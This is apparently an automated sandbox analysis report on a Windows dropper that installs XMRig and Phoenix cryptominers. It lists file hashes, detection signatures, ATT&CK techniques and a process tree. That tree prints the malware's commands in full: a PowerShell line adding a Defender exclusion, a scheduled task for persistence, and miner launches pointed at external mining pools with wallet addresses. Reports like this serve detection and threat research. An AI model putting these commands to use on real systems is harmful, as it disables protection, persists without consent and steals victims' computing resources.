Analysis

  • max time kernel
    43s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    30-09-2022 20:24

General

  • Target

    776735ffea7808b49399710d75968d191829b6403670257467e340ea83aed89b.exe

  • Size

    802KB

  • MD5

    dfa611cd9978c8099282d698d8ed4dc7

  • SHA1

    0aa3b51130d24e43ff7b6146c02bc517f78da12d

  • SHA256

    776735ffea7808b49399710d75968d191829b6403670257467e340ea83aed89b

  • SHA512

    93284d4b7d4bdeba22404d2521bb94f446f5838e8bc1cda34dfdb838dadefaab9dc0f32ee9235571c02572dec4f56869f1a11851d3fd3f4fd510fb0c7f1ff30f

  • SSDEEP

    24576:82G/nvxW3WdmsuTwueIzi6c4zjJwBnyW2ZCh5XXAhx:8bA3lsu0ueLgz6QW8Cyx

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Detectes Phoenix Miner Payload 2 IoCs
  • XMRig Miner payload 13 IoCs
  • Executes dropped EXE 3 IoCs
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 3 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 55 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\776735ffea7808b49399710d75968d191829b6403670257467e340ea83aed89b.exe
    "C:\Users\Admin\AppData\Local\Temp\776735ffea7808b49399710d75968d191829b6403670257467e340ea83aed89b.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1824
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1988
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\work.exe
        work.exe -priverdD
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1928
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\kesfg.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\kesfg.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1932
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:584
          • C:\Windows\system32\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp954.tmp.bat""
            5⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:320
            • C:\Windows\system32\timeout.exe
              timeout 3
              6⤵
              • Delays execution with timeout.exe
              PID:1028
            • C:\ProgramData\updateWindows\ULK.exe
              "C:\ProgramData\updateWindows\ULK.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:844
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1668
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ULK" /tr "C:\ProgramData\updateWindows\ULK.exe"
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:1004
                • C:\Windows\system32\schtasks.exe
                  schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ULK" /tr "C:\ProgramData\updateWindows\ULK.exe"
                  8⤵
                  • Creates scheduled task(s)
                  PID:1488
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a cryptonight-heavy --url=pool.hashvault.pro:5555 -u 42T9sTTMxUFKM5dzD4Abv21q91YTVw3icZc6NkWGa2psJd8MCPtzXjtWNpjcTYtN9Ri83rPq7dGKBjhn3pyH5vGGG9d5FC7 -R --variant=-1 --max-cpu-usage=50 --donate-level=1 -opencl
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                PID:876
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -pool ssl://eu1-etc.ethermine.org:5555 -wal 0xAA676adD882a7792EE0d7f3bBf25c045292b5d8e.Rig001 -coin etc -log 0
                7⤵
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                PID:1668

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scripting

1
T1064

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Scripting

1
T1064

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\updateWindows\ULK.exe
    Filesize

    844KB

    MD5

    64305a05cadf0f450c184acbc40c9f15

    SHA1

    9c946fce006da78a7a9e2fb22199a381d0d03775

    SHA256

    89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d

    SHA512

    342a1892b18fdd24bc3ff00a75142f47feb5e68419e5db9e3021a043966e36b843578214a566e92e80c9c788f7a1809b40d9172d8ff382e8255ed869b99c7c7d

  • C:\ProgramData\updateWindows\ULK.exe
    Filesize

    844KB

    MD5

    64305a05cadf0f450c184acbc40c9f15

    SHA1

    9c946fce006da78a7a9e2fb22199a381d0d03775

    SHA256

    89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d

    SHA512

    342a1892b18fdd24bc3ff00a75142f47feb5e68419e5db9e3021a043966e36b843578214a566e92e80c9c788f7a1809b40d9172d8ff382e8255ed869b99c7c7d

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat
    Filesize

    35B

    MD5

    ff59d999beb970447667695ce3273f75

    SHA1

    316fa09f467ba90ac34a054daf2e92e6e2854ff8

    SHA256

    065d2b17ad499587dc9de7ee9ecda4938b45da1df388bc72e6627dff220f64d2

    SHA512

    d5ac72cb065a3cd3cb118a69a2f356314eeed24dcb4880751e1a3683895e66cedc62607967e29f77a0c27adf1c9fe0efd86e804f693f0a63a5b51b0bf0056b5d

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\work.exe
    Filesize

    638KB

    MD5

    cd6171e97790b70941139bd0dde07770

    SHA1

    076567a9e68ad9cf615b212866b669585d86f5b8

    SHA256

    04c41c882234712a40150b3bff8b3ec0e0547ba0be375bd4f74cd30ce97d48b6

    SHA512

    1e4dc83896d7463adbee84c3de1f6763773ec8bea70a70f593502fbb56f5b0f2403ade7964be67eea0de4fd8ff53dacea0d58813bc6a8110f880ceae122aa390

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\work.exe
    Filesize

    638KB

    MD5

    cd6171e97790b70941139bd0dde07770

    SHA1

    076567a9e68ad9cf615b212866b669585d86f5b8

    SHA256

    04c41c882234712a40150b3bff8b3ec0e0547ba0be375bd4f74cd30ce97d48b6

    SHA512

    1e4dc83896d7463adbee84c3de1f6763773ec8bea70a70f593502fbb56f5b0f2403ade7964be67eea0de4fd8ff53dacea0d58813bc6a8110f880ceae122aa390

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\kesfg.exe
    Filesize

    844KB

    MD5

    64305a05cadf0f450c184acbc40c9f15

    SHA1

    9c946fce006da78a7a9e2fb22199a381d0d03775

    SHA256

    89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d

    SHA512

    342a1892b18fdd24bc3ff00a75142f47feb5e68419e5db9e3021a043966e36b843578214a566e92e80c9c788f7a1809b40d9172d8ff382e8255ed869b99c7c7d

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\kesfg.exe
    Filesize

    844KB

    MD5

    64305a05cadf0f450c184acbc40c9f15

    SHA1

    9c946fce006da78a7a9e2fb22199a381d0d03775

    SHA256

    89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d

    SHA512

    342a1892b18fdd24bc3ff00a75142f47feb5e68419e5db9e3021a043966e36b843578214a566e92e80c9c788f7a1809b40d9172d8ff382e8255ed869b99c7c7d

  • C:\Users\Admin\AppData\Local\Temp\tmp954.tmp.bat
    Filesize

    144B

    MD5

    b1b8ce953c5db210757ec0d12ff695a7

    SHA1

    db5c677f6faa1904efb8c5a6a1027f8d7e37854b

    SHA256

    f0384b8f5c679f3217672066ec1d400de604ae16d9d4e1d5a6316f987f8235a0

    SHA512

    a184b8ab11b02aab1956b12be002fa1dbf42f71652b52bc75e667bd4d3da26367f01d4114ef3664e9fb8bb12d92159debd3b4615f07961516c835a77e197b8c7

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    a6132a7ae68c7582ec9b31714151d1b4

    SHA1

    097c20c55065cf0fc4c41ca5e68f37adacd3e7d9

    SHA256

    370aba23a881d9973b788fa2cce560fa6e293921f3d062879a7d7004e5cb0345

    SHA512

    10518a35dd4186c66c442571a2e1113f7902d8d76f5a3a9e6b3d70e411ce87cf031eb717ca3a08737a8609d2edad03bd586d196ab42252098737ea396a793448

  • \ProgramData\updateWindows\ULK.exe
    Filesize

    844KB

    MD5

    64305a05cadf0f450c184acbc40c9f15

    SHA1

    9c946fce006da78a7a9e2fb22199a381d0d03775

    SHA256

    89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d

    SHA512

    342a1892b18fdd24bc3ff00a75142f47feb5e68419e5db9e3021a043966e36b843578214a566e92e80c9c788f7a1809b40d9172d8ff382e8255ed869b99c7c7d

  • \Users\Admin\AppData\Local\Temp\RarSFX0\work.exe
    Filesize

    638KB

    MD5

    cd6171e97790b70941139bd0dde07770

    SHA1

    076567a9e68ad9cf615b212866b669585d86f5b8

    SHA256

    04c41c882234712a40150b3bff8b3ec0e0547ba0be375bd4f74cd30ce97d48b6

    SHA512

    1e4dc83896d7463adbee84c3de1f6763773ec8bea70a70f593502fbb56f5b0f2403ade7964be67eea0de4fd8ff53dacea0d58813bc6a8110f880ceae122aa390

  • \Users\Admin\AppData\Local\Temp\RarSFX1\kesfg.exe
    Filesize

    844KB

    MD5

    64305a05cadf0f450c184acbc40c9f15

    SHA1

    9c946fce006da78a7a9e2fb22199a381d0d03775

    SHA256

    89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d

    SHA512

    342a1892b18fdd24bc3ff00a75142f47feb5e68419e5db9e3021a043966e36b843578214a566e92e80c9c788f7a1809b40d9172d8ff382e8255ed869b99c7c7d

  • memory/320-69-0x0000000000000000-mapping.dmp
  • memory/584-68-0x000007FEFB5C1000-0x000007FEFB5C3000-memory.dmp
    Filesize

    8KB

  • memory/584-67-0x0000000000000000-mapping.dmp
  • memory/584-70-0x000007FEED3D0000-0x000007FEEDDF3000-memory.dmp
    Filesize

    10.1MB

  • memory/584-73-0x0000000002744000-0x0000000002747000-memory.dmp
    Filesize

    12KB

  • memory/584-74-0x000007FEF5B00000-0x000007FEF665D000-memory.dmp
    Filesize

    11.4MB

  • memory/584-75-0x0000000002744000-0x0000000002747000-memory.dmp
    Filesize

    12KB

  • memory/584-76-0x000000000274B000-0x000000000276A000-memory.dmp
    Filesize

    124KB

  • memory/844-81-0x00000000013E0000-0x00000000014B8000-memory.dmp
    Filesize

    864KB

  • memory/844-78-0x0000000000000000-mapping.dmp
  • memory/876-113-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/876-95-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/876-130-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/876-124-0x0000000000000000-0x0000000001000000-memory.dmp
    Filesize

    16.0MB

  • memory/876-118-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/876-117-0x0000000000360000-0x0000000000380000-memory.dmp
    Filesize

    128KB

  • memory/876-116-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/876-114-0x0000000140343234-mapping.dmp
  • memory/876-103-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/876-111-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/876-101-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/876-99-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/876-109-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/876-108-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/876-106-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/876-94-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/876-104-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/876-97-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/1004-87-0x0000000000000000-mapping.dmp
  • memory/1028-72-0x0000000000000000-mapping.dmp
  • memory/1488-89-0x0000000000000000-mapping.dmp
  • memory/1668-90-0x00000000027B4000-0x00000000027B7000-memory.dmp
    Filesize

    12KB

  • memory/1668-120-0x0000000140000000-0x000000014082B000-memory.dmp
    Filesize

    8.2MB

  • memory/1668-92-0x00000000027B4000-0x00000000027B7000-memory.dmp
    Filesize

    12KB

  • memory/1668-91-0x000000001B900000-0x000000001BBFF000-memory.dmp
    Filesize

    3.0MB

  • memory/1668-88-0x000007FEEBED0000-0x000007FEECA2D000-memory.dmp
    Filesize

    11.4MB

  • memory/1668-129-0x0000000140000000-0x000000014082B000-memory.dmp
    Filesize

    8.2MB

  • memory/1668-86-0x000007FEECA30000-0x000007FEED453000-memory.dmp
    Filesize

    10.1MB

  • memory/1668-128-0x0000000140000000-0x000000014082B000-memory.dmp
    Filesize

    8.2MB

  • memory/1668-82-0x0000000000000000-mapping.dmp
  • memory/1668-127-0x0000000140000000-0x000000014082B000-memory.dmp
    Filesize

    8.2MB

  • memory/1668-119-0x0000000140000000-0x000000014082B000-memory.dmp
    Filesize

    8.2MB

  • memory/1668-93-0x00000000027BB000-0x00000000027DA000-memory.dmp
    Filesize

    124KB

  • memory/1668-122-0x0000000140000000-0x000000014082B000-memory.dmp
    Filesize

    8.2MB

  • memory/1668-126-0x0000000140000000-0x000000014082B000-memory.dmp
    Filesize

    8.2MB

  • memory/1668-123-0x0000000140000000-0x000000014082B000-memory.dmp
    Filesize

    8.2MB

  • memory/1668-125-0x0000000140829C40-mapping.dmp
  • memory/1824-54-0x0000000075571000-0x0000000075573000-memory.dmp
    Filesize

    8KB

  • memory/1928-59-0x0000000000000000-mapping.dmp
  • memory/1932-63-0x0000000000000000-mapping.dmp
  • memory/1932-66-0x0000000000BC0000-0x0000000000C98000-memory.dmp
    Filesize

    864KB

  • memory/1988-55-0x0000000000000000-mapping.dmp